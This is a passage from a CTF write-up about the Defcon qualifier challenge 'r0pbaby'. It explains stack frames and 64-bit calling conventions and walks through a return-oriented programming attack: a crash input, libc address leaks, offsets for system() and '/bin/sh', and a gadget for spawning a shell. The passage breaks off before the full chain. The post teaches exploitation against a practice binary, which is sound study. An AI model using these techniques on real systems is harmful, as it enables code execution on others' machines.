This past weekend I competed in the Defcon CTF Qualifiers from the Legit Business Syndicate. In the past it’s been one of my favourite competitions, and this year was no exception!
Unfortunately, I got stuck for quite a long time on a 2-point problem (“wwtw”) and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!
r0pbaby is neat, because it’s an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode. Much of the time, it’s actually easier! You can see the binary, my solution, and other stuff I used on this github repo.
It might make sense to read a post I made in 2013 about a level in PlaidCTF called ropasaurusrex. But it’s not really necessary - I’m going to explain the same stuff again with two years more experience!
What is ROP?
Most modern systems have DEP - data execution prevention - enabled. That means that when trying to run arbitrary code, the code has to be in memory that’s executable. Typically, when a process is running, all memory segments are either writable (+w) or executable (+x) - not both. That’s sometimes called “W^X”, but it seems more appropriate to just call it common sense.
ROP - return-oriented programming - is an exploitation technique that bypasses DEP. It does that by chaining together legitimate code that’s already in executable memory. This requires the attacker to either a) have complete control of the stack, or b) have control of rip/eip (the instruction pointer register) and the ability to change esp/rsp (the stack pointer) to point to another buffer.
As a quick example, let’s say you overwrite the return address of a vulnerable function with the address of libc’s sleep() function. When the vulnerable function attempts to return, instead of returning to where it’s supposed to (or returning to shellcode), it’ll return to the first line of sleep().
On a 32-bit system, sleep() will look at the next-to-next value on the stack to find out how long to sleep(). On a 64-bit system, it’ll look at the value of the rdi register for its argument, which is a little more elaborate to set up. When it’s done, it’ll return to the next value on the stack on both architectures, which could very well be another function.
So basically, sleep() expects its stack to look like this on 32-bit:
+----------------------+
|...higher addresses...|
+----------------------+
|         1000         | <-- sleep() looks here for its param (on 32-bit)
+----------------------+
|    [return addr]     | <-- where esp will be when sleep() is entered
+----------------------+
|    [sleep's addr]    | <-- return addr of previous function
+----------------------+
|...lower addresses....| <-- other data from previous function
+----------------------+
And on 64-bit:
+----------------------+
|...higher addresses...|
+----------------------+ <-- sleep()'s param is in rdi, so it's not needed here
|    [return addr]     | <-- where rsp will be when sleep() is entered
+----------------------+
|    [sleep's addr]    | <-- return addr of previous function
+----------------------+
|...lower addresses....| <-- other data from previous function
+----------------------+
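To make the two layouts concrete, here’s a minimal Ruby sketch that packs the values an attacker would write, starting at the overwritten return address. All of the addresses are made-up placeholders for illustration, not values from the challenge.

```ruby
# Hypothetical addresses, chosen only for illustration.
SLEEP_ADDR_32  = 0x08041234
RETURN_ADDR_32 = 0x08045678
SLEEP_ADDR_64  = 0x00007ffff7001234
RETURN_ADDR_64 = 0x00007ffff7005678

# 32-bit: sleep()'s address, then where sleep() returns to, then its argument.
# "V" packs an unsigned 32-bit little-endian integer.
chain32 = [SLEEP_ADDR_32, RETURN_ADDR_32, 1000].pack("V*")

# 64-bit: the argument travels in rdi, so only the two addresses go on the stack.
# "Q<" packs an unsigned 64-bit little-endian integer.
chain64 = [SLEEP_ADDR_64, RETURN_ADDR_64].pack("Q<*")

puts chain32.bytesize
puts chain64.bytesize
```

Note that the 64-bit chain never sets rdi by itself, which is exactly the gap a gadget has to fill later on.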
We’ll dive into deeper detail of how to set this up and see way more stack diagrams shortly. But let’s start from the beginning!
Taking a first look
When you run r0pbaby, or connect to their service, you will see a prompt (the program uses stdin/stdout for i/o):
$ ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
It’s worthwhile messing with the options a bit to get a feel for it:
$ ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF8B28
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7883960
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: printf
Symbol printf: 0x00007FFFF7892F10
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): hello???
Invalid amount.
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
We’ll look at option 3 more in a little while, but for now let’s take a quick look at options 1 and 2. The rest of this section isn’t directly applicable to the exploitation stuff, so you’re free to skip it if you want. :)
If you look at the results from option 1 and option 2, you’ll see one strange thing: the return from “Get libc address” is higher than the addresses of printf() and system(). It also isn’t page aligned (a multiple of 0x1000 (4096), usually), so it almost certainly isn’t actually the base address (which, in fairness, the level doesn’t explicitly say it is).
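Both observations are quick to check in Ruby. This is just a sketch using the addresses printed above; the 0x1000 page size is the usual x86-64 Linux value and is an assumption here.

```ruby
PAGE_SIZE = 0x1000 # assumed page size (4096 bytes)

# True when addr is a multiple of the page size.
def page_aligned?(addr)
  (addr & (PAGE_SIZE - 1)).zero?
end

reported_libc = 0x00007FFFF7FF8B28 # from option 1
system_addr   = 0x00007FFFF7883960 # from option 2
printf_addr   = 0x00007FFFF7892F10 # from option 2

puts page_aligned?(reported_libc)  # false: the low 12 bits are 0xb28
puts reported_libc > system_addr   # true: "libc" sits above system()
puts reported_libc > printf_addr   # true: and above printf()
```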
I messed around a bit out of curiosity. Here’s what I discovered…
First, run the program in gdb and get the address that they claim is libc:
$ gdb -q ./r0pbaby
Reading symbols from ./r0pbaby...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/ron/defcon-quals/r0pbaby/r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF8B28
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
So that’s what it returns: 0x00007FFFF7FF8B28. Now we use ctrl-c to break into the debugger and figure out the real base address:
: ^C
Program received signal SIGINT, Interrupt.
0x00007ffff791e5e0 in __read_nocancel () from /lib64/libc.so.6
(gdb) info proc map
process 5475
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x555555554000     0x555555556000     0x2000        0x0 /home/ron/defcon-quals/r0pbaby/r0pbaby
      0x555555755000     0x555555757000     0x2000     0x1000 /home/ron/defcon-quals/r0pbaby/r0pbaby
      0x555555757000     0x555555778000    0x21000        0x0 [heap]
      0x7ffff7842000     0x7ffff79cf000   0x18d000        0x0 /lib64/libc-2.20.so
      0x7ffff79cf000     0x7ffff7bce000   0x1ff000   0x18d000 /lib64/libc-2.20.so
      0x7ffff7bce000     0x7ffff7bd2000     0x4000   0x18c000 /lib64/libc-2.20.so
      0x7ffff7bd2000     0x7ffff7bd4000     0x2000   0x190000 /lib64/libc-2.20.so
[...]
This tells us that the actual address where libc is loaded is 0x7ffff7842000. Theirs was definitely wrong!
On a Linux system, the first 4 bytes at the base address will usually be “\x7fELF” or “\x7f\x45\x4c\x46”. We can check the first four bytes at the actual base address to verify:
(gdb) x/8xb 0x7ffff7842000
0x7ffff7842000: 0x7f 0x45 0x4c 0x46 0x02 0x01 0x01 0x00
(gdb) x/8xc 0x7ffff7842000
0x7ffff7842000: 127 '\177' 69 'E' 76 'L' 70 'F' 2 '\002' 1 '\001' 1 '\001' 0 '\000'
And we can check the base address that the program tells us:
(gdb) x/8xb 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00 0x20 0x84 0xf7 0xff 0x7f 0x00 0x00
From experience, that looks like a 64-bit address to me (6 bytes long, starts with 0x7f if you read it in little endian), so I tried printing it as a 64-bit value:
(gdb) x/xg 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00007ffff7842000
Aha! It’s a pointer to the actual base address! It seems a little odd to send that to the user, since it does them basically no good, so I’ll assume that it’s a bug. :)
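The same two checks can be reproduced outside gdb. Here’s a small Ruby sketch that takes the raw bytes from the two memory dumps above, checks the ELF magic, and reads the eight bytes as a little-endian 64-bit value.

```ruby
# Bytes gdb showed at the real base address (0x7ffff7842000).
header = [0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00].pack("C*")
ELF_MAGIC = "\x7fELF".b
puts header.start_with?(ELF_MAGIC) # true

# Bytes gdb showed at the address the program reported (0x7ffff7ff8b28).
raw = [0x00, 0x20, 0x84, 0xf7, 0xff, 0x7f, 0x00, 0x00].pack("C*")

# "Q<" reads an unsigned 64-bit little-endian integer.
pointer = raw.unpack1("Q<")
puts "0x%016x" % pointer # 0x00007ffff7842000
```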
Stealing libc
If there’s one thing I hate, it’s attacking a level blind. Based on the output so far, it’s pretty clear that they’re going to want us to call a libc function, but they don’t actually give us a copy of libc.so! While it’s not strictly necessary, having a copy of libc.so makes this far easier.
I’ll post more details about how and why to steal libc in a future post, but for now, suffice it to say: if you can, beat the easiest 64-bit level first (like babycmd) and liberate a copy of libc.so. Also snag a 32-bit version of libc if you can find one. Believe me, you’ll be thankful for it later! To make it possible to follow the rest of this post, here’s libc-2.19.so from babycmd and here’s libc-2.20.so from my box, which is the one I’ll use for this writeup.
You might be wondering how to verify whether or not that actually IS the right library. For now, let’s consider that to be homework. I’ll be writing more about that in the future, I promise!
Find a crash
I played around with option 3 for a while, but it kept giving me a length error. So I used the best approach for annoying CTF problems: I asked a teammate who’d already solved that problem. He’d reverse engineered the function already, saving me the trouble. :)
It turns out that the correct way to format things is by sending a length, then a newline, then the payload:
$ ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 20
AAAAAAAAAAAAAAAAAAAA
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
Segmentation fault
Well, that may be one of the easiest ways I’ve gotten a segfault! But the work isn’t quite done. :)
rip control
Our first goal is going to be to get control of rip (that’s like eip, the instruction pointer, but on a 64-bit system). As you probably know by now, rip is the register that points to the current instruction being executed. If we move it, different code runs. The classic attack is to move eip to point at shellcode, but ROP is different. We want to carefully control rip to make sure it winds up in all the right places.
But first, let’s non-carefully control it!
The program indicates that it’s writing the r0p buffer to the stack, so the easiest thing to do is probably to start throwing stuff into the buffer to see what happens. I like to send a string with a series of values I’ll recognize in a debugger. Since it’s a 64-bit app, I send 8 “A”s, 8 “B”s, and so on. If it doesn’t crash, I send more.
$ gdb -q ./r0pbaby
(gdb) run
[...]
: 3
Enter bytes to send (max 1024): 32
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Program received signal SIGSEGV, Segmentation fault.
0x0000555555554eb3 in ?? ()
All right, it crashes at 0x0000555555554eb3. Let’s take a look at what lives at the current instruction (pro-tip: “x/i $rip” or equivalent is basically always the first thing I run on any crash I’m investigating):
(gdb) x/i $rip
=> 0x555555554eb3: ret
It’s crashing while attempting to return! That generally only happens when either the stack pointer is messed up…
(gdb) print/x $rsp
$1 = 0x7fffffffd918
…which it doesn’t appear to be, or when it’s trying to return to a bad address…
(gdb) x/xg $rsp
0x7fffffffd918: 0x4242424242424242
…which it is! It’s trying to return to 0x4242424242424242 (“BBBBBBBB”), which is an illegal address (on x86-64, the top two bytes of a user-space address have to be zero).
We can confirm this, and also prove to ourselves that NUL bytes are allowed in the input, by sending a couple of NUL bytes. I’m switching to using ‘echo’ on the commandline now, so I can easily add NUL bytes (keep in mind that because of little endian, the NUL bytes have to go after the “B”s, not before):
$ ulimit -c unlimited
$ echo -ne '3\n32\nAAAAAAAABBBBBB\0\0CCCCCCCCDDDDDDDD\n' | ./r0pbaby
[...]
Segmentation fault (core dumped)
$ gdb ./r0pbaby ./core
[...]
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x0000424242424242 in ?? ()
Now we can see that rip was successfully set to 0x0000424242424242 (“BBBBBB\0\0” because of little endian)!
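If you’d rather not count letters by hand, here’s a short Ruby sketch that builds the marker pattern, finds which 8-byte slot ended up in rip, and shows why the NUL bytes have to come after the “B”s.

```ruby
# Eight of each letter, one letter per 64-bit stack slot.
pattern = ("A".."D").map { |c| c * 8 }.join
puts pattern # AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD

# The slot that landed in rip tells us the offset of the return address.
offset = pattern.index("BBBBBBBB")
puts offset # 8

# Little endian: the first byte in memory is the least significant one,
# so trailing NUL bytes become the leading zeros of the address.
slot = "BBBBBB\0\0"
puts "0x%016x" % slot.unpack1("Q<") # 0x0000424242424242
```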
How's the stack work again?
As I said at the start, reading my post about ropasaurusrex would be a good way to get acquainted with ROP exploits. If you’re pretty comfortable with stacks or you’ve recently read/understood that post, feel free to skip this section!
Let’s start by talking about 32-bit systems - where parameters are passed on the stack instead of in registers. I’ll explain how to deal with register parameters in 64-bit below.
Okay, so: a program’s stack is a run-time structure that holds temporary values that functions need. Things like the parameters, the local variables, the return address, and other stuff. When a function is called, it allocates itself some space on the stack by growing downward (towards lower memory addresses). When the function returns, the data’s all removed from the stack (it’s not actually wiped from memory, it just becomes free to get overwritten). The register rsp always points to the most recent thing pushed to the stack and the next thing that would be popped off the stack.
Let’s use sleep() as an example again. You call sleep() like this:
1: push 1000
2: call sleep
or like this:
1: mov [esp], 1000
2: call sleep
They’re identical, as far as sleep() is concerned. The first is a tiny bit more memory efficient and the second is a tiny bit faster, but that’s about it.
Before line 1, we don’t know or care what’s on the stack. We can look at it like this (I’m choosing completely arbitrary addresses so you can match up diagrams with each other):
        +----------------------+
        |...higher addresses...|
        +----------------------+
0x1040  |     (irrelevant)     |
        +----------------------+
0x103c  |     (irrelevant)     |
        +----------------------+
0x1038  |     (irrelevant)     | <-- rsp
        +----------------------+
0x1034  |       (unused)       |
        +----------------------+
0x1030  |       (unused)       |
        +----------------------+
        |...lower addresses....|
        +----------------------+
Values lower than rsp are unused. That means that as far as the stack’s concerned, they’re unallocated. They might be zero, or they might contain values from previous function calls. In a properly working system, they’re never read. If they’re accidentally used (like if somebody declares a variable but forgets to initialize it), you could wind up with an uninitialized-memory vulnerability or similar.
The value that rsp is pointing to and the values above it (at higher addresses) also don’t really matter. They’re part of the stack frame for the function that’s calling sleep(), and sleep() doesn’t care about those. It only cares about its own stack frame (a stack frame, as we’ll see, is the parameters, return address, saved registers, and local variables of a function - basically, everything the function stores on the stack and everything it cares about on the stack).
Line 1 pushes 1000 onto the stack. The frame will then look like this:
        +----------------------+
        |...higher addresses...|
        +----------------------+
0x103c  |     (irrelevant)     |
        +----------------------+
0x1038  |     (irrelevant)     | <-- stuff from the previous function
        +----------------------+
        +----------------------+ <-- start of sleep()'s stack frame
0x1034  |         1000         | <-- rsp
        +----------------------+
0x1030  |       (unused)       |
        +----------------------+
        |...lower addresses....|
        +----------------------+
When you call the function at line 2, it pushes the return address onto the stack, like this:
        +----------------------+
        |...higher addresses...|
        +----------------------+
0x1038  |     (irrelevant)     |
        +----------------------+
        +----------------------+ <-- start of sleep()'s stack frame
0x1034  |         1000         |
        +----------------------+
0x1030  |    [return addr]     | <-- rsp
        +----------------------+
0x102c  |       (unused)       |
        +----------------------+
0x1028  |       (unused)       |
        +----------------------+
0x1024  |       (unused)       |
        +----------------------+
        |...lower addresses....|
        +----------------------+
Note how rsp has moved from 0x1038 to 0x1034 to 0x1030 as stuff is added to the stack. But it always points to the last thing added!
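Here’s a toy Ruby model of those two steps, using the same arbitrary addresses as the diagrams. It’s only a sketch of the bookkeeping: a hash stands in for memory and a 4-byte word size matches the 32-bit example.

```ruby
WORD = 4          # 32-bit stack slots, as in the diagrams
sp = 0x1038       # stack pointer before line 1
memory = {}       # address => value, standing in for the stack

# push: move the stack pointer down one word, then store the value there.
push = lambda do |value|
  sp -= WORD
  memory[sp] = value
end

push.call(1000)            # line 1: push 1000
after_push = sp            # 0x1034

push.call(:return_addr)    # line 2: call pushes the return address
after_call = sp            # 0x1030

puts "0x%x 0x%x" % [after_push, after_call]
```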
Let’s look at how sleep() might be implemented. This is a very common function prelude:
100: sleep():
101: push rbp
102: mov rbp, rsp
103: sub rsp, 0x20
104: …everything else…
(Note that those are line numbers for reference, not actual addresses, so please don’t get upset that the values don’t increment enough :) )
At line 101, the old frame pointer is saved to the stack:
        +----------------------+
        |...higher addresses...|
        +----------------------+
0x1038  |     (irrelevant)     |
        +----------------------+
        +----------------------+ <-- start of sleep()'s stack frame
0x1034  |         1000         |
        +----------------------+
0x1030  |    [return addr]     |
        +----------------------+
0x102c  |    [saved frame]     | <-- rsp
        +----------------------+
0x1028  |       (unused)       |
        +----------------------+
0x1024  |       (unused)       |
        +----------------------+
0x1020  |       (unused)       |
        +----------------------+
        |...lower addresses....|
        +----------------------+
Then at line 102, nothing on the stack changes (rbp is just set to the current value of rsp). On line 103, 0x20 is subtracted from rsp, which effectively reserves 0x20 (32) bytes for local variables:
        +----------------------+
        |...higher addresses...|
        +----------------------+
0x1038  |     (irrelevant)     |
        +----------------------+
        +----------------------+ <-- start of sleep()'s stack frame
0x1034  |         1000         |
        +----------------------+
0x1030  |    [return addr]     |
        +----------------------+
0x102c  |    [saved frame]     |
        +----------------------+
        |                      |
0x1028  |                      |
   -    |     [local vars]     | <-- rsp
0x1008  |                      |
        |                      |
        +----------------------+ <-- end of sleep()'s stack frame
        +----------------------+
0x1004  |       (unused)       |
        +----------------------+
0x1000  |       (unused)       |
        +----------------------+
        |...lower addresses....|
        +----------------------+
And that’s the entire stack frame for the sleep() function call! It’s possible that there are other registers preserved on the stack, in addition to rbp, but that doesn’t really change anything. We only care about the parameters and the return address.
If sleep() calls a function, the same process will happen:
        +----------------------+
        |...higher addresses...|
        +----------------------+
0x1038  |     (irrelevant)     |
        +----------------------+
        +----------------------+ <-- start of sleep()'s stack frame
0x1034  |         1000         |
        +----------------------+
0x1030  |    [return addr]     |
        +----------------------+
0x102c  |    [saved frame]     |
        +----------------------+
        |                      |
0x1028  |                      |
   -    |     [local vars]     |
0x1008  |                      |
        |                      |
        +----------------------+ <-- end of sleep()'s stack frame
        +----------------------+ <-- start of next function's stack frame
0x1004  |       [params]       |
        +----------------------+
0x1000  |    [return addr]     |
        +----------------------+
0x0ffc  |    [saved frame]     |
        +----------------------+
        |                      |
0x0ff8  |                      |
   -    |     [local vars]     |
0x0fb4  |                      |
        |                      |
        +----------------------+ <-- end of next function's stack frame
        +----------------------+
0x0fb0  |       (unused)       |
        +----------------------+
0x0fac  |       (unused)       |
        +----------------------+
        |...lower addresses....|
        +----------------------+
And so on, with the stack constantly growing towards lower addresses. When the function returns, the same thing happens in reverse order (the local vars are removed from the stack by adding to rsp (or replacing it with rbp), rbp is popped off the stack, and the return address is popped and returned to).
The parameters are cleared off the stack by either the caller or callee, depending on the compiler, but that won’t come into play for this writeup. However, when ROP is used to call multiple functions, unless the functions clean up their own parameters off the stack, the exploit developer has to do it themselves. Typically, on Windows functions clean up after themselves but on other OSes they don’t (but you can’t rely on that). This is done by using a “pop ret”, “pop pop ret”, etc., after each function call. See my ropasaurusrex writeup for more details.
Enter: 64-bit
The fact that this level is 64-bit complicates things in important ways (and ways that I always seem to forget about till things don’t work).
Specifically, in 64-bit, the first handful of parameters to a function are passed in registers, not on the stack. I don’t have the order of registers memorized - I forget it after every CTF, along with whether ja/jb or jl/jg are the unsigned ones - but the first two are rdi and rsi. That means that to call the same sleep() function on 64-bit, we’d have this code instead:
1: mov rdi, 1000
2: call sleep
And its stack frame would look like this:
        +----------------------+
        |...higher addresses...|
        +----------------------+ <-- start of previous function's stack frame
        +----------------------+ <-- start of sleep()'s stack frame
0x1030  |    [return addr]     |
        +----------------------+
0x102c  |    [saved frame]     |
        +----------------------+
        |                      |
0x1028  |                      |
   -    |     [local vars]     |
0x1008  |                      |
        |                      |
        +----------------------+ <-- end of sleep()'s stack frame
        +----------------------+
        |...lower addresses....|
        +----------------------+
No parameters, just the return address, saved frame pointer, and local variables. It’s exceedingly rare for the stack to be used for parameters on 64-bit.
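For reference, since the register order is easy to forget: on Linux (the System V AMD64 calling convention), the first six integer or pointer arguments go in rdi, rsi, rdx, rcx, r8 and r9, and anything beyond that goes on the stack. Here’s a tiny Ruby lookup table; the helper name is made up for this sketch, and it ignores floating-point arguments, which use separate registers.

```ruby
# System V AMD64 calling convention: integer/pointer argument registers, in order.
ARG_REGISTERS = %w[rdi rsi rdx rcx r8 r9].freeze

# Hypothetical helper: where does the Nth (0-based) integer argument live?
def argument_location(index)
  ARG_REGISTERS[index] || "stack"
end

puts argument_location(0) # rdi
puts argument_location(1) # rsi
puts argument_location(6) # stack
```

Windows uses a different order (rcx, rdx, r8, r9), so this table only applies to targets like this one.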
Stacks: the important bit
Okay, so that’s a stack frame. A stack frame contains parameters, return address, saved registers, and local variables. On 64-bit, it usually contains the return address, saved registers, and local variables (no parameters).
But here’s the thing: when you enter a function - that is to say, when you start running the first line of the function - the function doesn’t really know where you came from. I mean, not really. It knows the return address that’s on the stack, but doesn’t really have a way to validate that it’s real (except with advanced exploitation mitigations). It also knows that there are some parameters right before (at higher addresses than) the return address, if it’s 32-bit. Or that rdi/rsi/etc. contain parameters if it’s 64-bit.
So let’s say you overwrote the return address on the stack and returned to the first line of sleep(). What’s it going to do?
As we saw, on 64-bit, sleep() expects its stack frame to contain a return address:
+----------------------+
|...higher addresses...|
+----------------------+
+----------------------+ <-- start of sleep()'s stack frame
|    [return addr]     | <-- rsp
+----------------------+
|    (unallocated)     |
+----------------------+
|...lower addresses....|
+----------------------+
sleep() will push some registers, make room for local variables, and really just do its own thing. When it’s all done, it’ll grab the return address from the stack, return to it, and somebody will move rsp back to the calling function’s stack frame (i.e., getting rid of the parameters from the stack).
Using system()
Because this level uses stdout and stdin for i/o, all we really have to do is make this call:
system("/bin/sh")
Then we can run arbitrary commands. Seems pretty simple, eh? We don’t even care where system() returns to, once it’s done the program can just crash!
You just have to do two things:
- set rip to the address of system()
- set rdi to a pointer to the string "/bin/sh" (or just "sh" if you prefer)
Setting rip to the address of system() is easy. We have the address of system() and we have rip control, as we discovered. It’s just a matter of grabbing the address of system() and using that in the overflow.
Setting rdi to the pointer to “/bin/sh” is a little more problematic, though. First, we need to find the address of “/bin/sh” somehow. Then we need a “gadget” to put it in rdi. A “gadget”, in ROP, refers to a small piece of code that performs an operation then returns.
It turns out, all of the above can be easily done by using a copy of libc.so. Remember how I told you it’d come in handy?
Finding "/bin/sh"
So, this is actually pretty easy. We need to find “/bin/sh” given a) the ability to leak an address in libc.so (which this program does by design), and b) a copy of libc.so. Even with ASLR turned on, any two addresses within the same binary (like within libc.so or within the binary itself) won’t change their relative positions to each other. Addresses in two different binaries will likely be different, though.
If you fire up IDA, and go to the “strings” tab (shift-F12), you can search for “/bin/sh”. You’ll see that “/bin/sh” will have an address something like 0x7ffff6aa307c.
Alternatively, you can use this gdb command (helpfully supplied by bla from io.sts):
(gdb) find /b 0x7ffff7842000,0x7ffff7bd4000, '/','b','i','n','/','s','h'
0x7ffff79a307c
warning: Unable to access 16000 bytes of target memory at 0x7ffff79d5d03, halting search.
1 pattern found.
(gdb) x/s 0x7ffff79a307c
0x7ffff79a307c: "/bin/sh"
Once you’ve obtained the address of “/bin/sh”, find the address of any libc function - we’ll use system(), since system() will come in handy later. The address will be something like 0x00007ffff6983960. If you subtract the two addresses, you’ll discover that the address of “/bin/sh” is 0x11f71c bytes after the address of system(). As I said earlier, that won’t change, so we can reliably use that in our exploit.
Now when you run the program:
$ ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7883960
You can easily calculate that the address of the string “/bin/sh” will be at 0x00007ffff7883960 + 0x11f71c = 0x7ffff79a307c.
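The arithmetic is simple enough to script. This sketch uses the two IDA addresses quoted above to derive the offset, then applies it to the address the program leaks at run time.

```ruby
# Addresses as shown in IDA (only their difference matters).
IDA_SH_ADDR     = 0x7ffff6aa307c
IDA_SYSTEM_ADDR = 0x00007ffff6983960

SH_OFFSET = IDA_SH_ADDR - IDA_SYSTEM_ADDR
puts "0x%x" % SH_OFFSET # 0x11f71c

# Address printed by option 2 for "system"; String#hex accepts the 0x prefix.
leaked_system = "0x00007FFFF7883960".hex

sh_addr = leaked_system + SH_OFFSET
puts "0x%x" % sh_addr # 0x7ffff79a307c
```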
Getting "/bin/sh" into rdi
The next thing you’ll want to do is put the address of “/bin/sh” into rdi. We can do that in two steps (recall that we have control of the stack - it’s the point of the level):
- Put it on the stack
- Find a "pop rdi" gadget
To do this, I literally searched for “pop rdi” in IDA. With the spaces and everything! :)
I found this in both my own copy of libc and the one I stole from babycmd:
.text:00007FFFF80E1DF1 pop rax
.text:00007FFFF80E1DF2 pop rdi
.text:00007FFFF80E1DF3 call rax
What a beautiful sequence! It pops the next value off the stack into rax, pops the next value into rdi, and calls rax. So it calls an address from the stack with a parameter read from the stack. It’s such a lovely gadget! I was surprised and excited to find it, though I’m sure every other CTF team already knew about it. :)
The absolute address that IDA gives us is 0x00007ffff80e1df1, but just like the “/bin/sh” string, the address relative to the rest of the binary never changes. If you subtract the address of system() from that address, you’ll get 0xa7969 (on my copy of libc).
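If you don’t have IDA handy, the gadget can also be located by searching for its machine code. On x86-64, pop rax encodes as 58, pop rdi as 5f, and call rax as ff d0, so the whole gadget is the four bytes 58 5f ff d0. Below is a rough Ruby sketch; the function name and the sample blob are made up for illustration. In practice you’d pass it something like File.binread on your copy of libc, keeping in mind that the result is a file offset, which only equals the offset in memory when the containing segment is mapped at file offset 0.

```ruby
# Machine code for: pop rax; pop rdi; call rax
GADGET_BYTES = "\x58\x5f\xff\xd0".b

# Hypothetical helper: byte offset of the first match in blob, or nil.
def find_gadget(blob, pattern = GADGET_BYTES)
  blob.b.index(pattern)
end

# Stand-in for a library image: five NOPs, the gadget, then a ret.
sample = ("\x90" * 5 + "\x58\x5f\xff\xd0" + "\xc3").b

puts find_gadget(sample)              # 5
puts find_gadget("no gadget").inspect # nil
```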
Let’s look at an example of what’s actually going on when we call that gadget. You’re at the end of main() and getting ready to return. rsp is pointing to what it thinks is the return address, but is really “BBBBBBBB”-now-gadget_addr:
+----------------------+
|...higher addresses...|
+----------------------+
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|  0x00007ffff80e1df1  | <-- rsp
+----------------------+
|       AAAAAAAA       |
+----------------------+
|...lower addresses....|
+----------------------+
When the return happens, it looks like this:
+----------------------+
|...higher addresses...|
+----------------------+
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       | <-- rsp
+----------------------+
|  0x00007FFFF80E1DF1  |
+----------------------+
|       AAAAAAAA       |
+----------------------+
|...lower addresses....|
+----------------------+
The first instruction - pop rax - runs. rax is now 0x4343434343434343 (“CCCCCCCC”).
The second instruction - pop rdi - runs. rdi is now 0x4444444444444444 (“DDDDDDDD”).
Then the final instruction - call rax - runs. It’ll attempt to call 0x4343434343434343, with 0x4444444444444444 as its parameter, and crash. Controlling both the called address and the parameter is a huge win!
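Those three steps can be mimicked with a toy model in Ruby. This is only an illustration of the data flow: an array stands in for the stack (first element is where rsp points) and a hash stands in for the registers.

```ruby
# Toy model of the gadget: pop rax; pop rdi; call rax
def run_gadget(stack)
  regs = {}
  regs[:rax] = stack.shift     # pop rax
  regs[:rdi] = stack.shift     # pop rdi
  regs[:called] = regs[:rax]   # call rax (we only record the target)
  regs
end

# What sits above the gadget's address in the test payload.
stack = ["CCCCCCCC", "DDDDDDDD"].map { |slot| slot.unpack1("Q<") }

regs = run_gadget(stack)
puts "call 0x%x with rdi = 0x%x" % [regs[:called], regs[:rdi]]
```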
Putting it all together
I realize this is a lot to take in if you can’t read stacks backwards and forwards (trust me, I frequently read stacks backwards - in fact, I wrote this entire blog post with upside-down stacks before I noticed and had to go back and fix it! :) ).
Here’s what we have:
- The ability to write up to 1024 bytes onto the stack
- The ability to get the address of system()
- The ability to get the address of "/bin/sh", based on the address of system()
- The ability to get the address of a sexy gadget, also based on system(), that'll call something from the stack with a parameter from the stack
We’re overflowing a local variable in main(). Immediately before our overflow, this is what main()’s stack frame probably looks like:
+----------------------+
|...higher addresses...|
+----------------------+ <-- start of main()'s stack frame
|         argv         |
+----------------------+
|         argc         |
+----------------------+
|    [return addr]     | <-- return address of main()
+----------------------+
|    [saved frame]     | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     | <-- rsp
|                      |
|                      |
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+
Because you only get 8 bytes before you hit the return address, the first 8 bytes are probably overwriting the saved frame pointer (or whatever, it doesn’t really matter, but you can prove it’s the frame pointer by using a debugger and verifying that rbp is 0x4141414141414141 after it returns (it is)).
The main thing is, as we saw earlier, if you send the string “AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD”, the “BBBBBBBB” winds up as main()’s return address. That means the stack winds up looking like this before main() starts cleaning up its stack frame:
+----------------------+
|...higher addresses...|
+----------------------+ <-- WAS the start of main()'s stack frame
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|       BBBBBBBB       | <-- return address of main()
+----------------------+
|       AAAAAAAA       | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     |
|                      |
|                      | <-- rsp
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+
When main attempts to return, it tries to return to 0x4242424242424242 as we saw earlier, and it crashes.
Now, one thing we can do is return directly to system(). Your guess is as good as mine as to what’s in rdi, but you can bet it’s not going to be “/bin/sh”. So instead, we return to our gadget:
+----------------------+
|...higher addresses...|
+----------------------+ <-- start of main()'s stack frame
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|     gadget_addr      | <-- return address of main()
+----------------------+
